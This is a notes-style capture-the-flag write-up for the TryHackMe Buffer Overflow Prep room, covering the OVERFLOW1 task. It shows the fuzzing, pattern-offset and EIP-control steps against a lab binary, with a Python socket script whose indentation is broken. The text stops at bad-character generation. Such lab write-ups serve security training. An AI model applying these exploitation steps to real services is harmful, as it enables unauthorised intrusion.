Buffer Overflow Prep — OverFlow1- TryHackMe

This is a write-up for Buffer Overflow Prep room by Tib3rius on Try Hack Me in notes style format.

Useful Links
=======

⇒ https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
⇒ https://tryhackme.com/room/bufferoverflowprep

Fuzzing with long input Strings
==================
⇒ python3 -c ‘print (“A” * 5000)’ ⇒ Generate lots of As
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send these A’s to target : OVERFLOW1 AAAA….5000 times
⇒ OSCP.exe crashes indicated we can exploit this using Buffer Overflow.

MSF Pattern create
===========
⇒ msf-pattern_create -l 5000
⇒ send over to the target exe via nc session only.

Mona Config
========
⇒ !mona config -set workingfolder c:\mona\%p ⇒ Run this in Immunity

Finding Offset
========
⇒ In Immunity Debugger note the EIP after sending the pattern and crashing the exe.

⇒ msf-pattern_offset -l 5000 -q 6F43396E <====EIP

Offset is at 1978.

⇒ Fuzz again with 1978 A’s and 4 B’s
* python3 -c ‘print (“A” * 1978 + “B” * 4)’

• So we see EIP is filled with four B’s. We found the exact sweet spot.

⇒ Python 3 script to test the same:

import socket
import sys
    message = b"OVERFLOW1 " #Notice the space in the end
    payload = message + b"A" * 1978 + b"B" * 4

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.10.194.7',1337))
        s.recv(1024)
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close
except:
        print("Cannot connect to server")
        sys.exit()

Finding Bad Characters
=============
⇒ !mona bytearray -b “\x00” ⇒ Run this in Immunity to generate…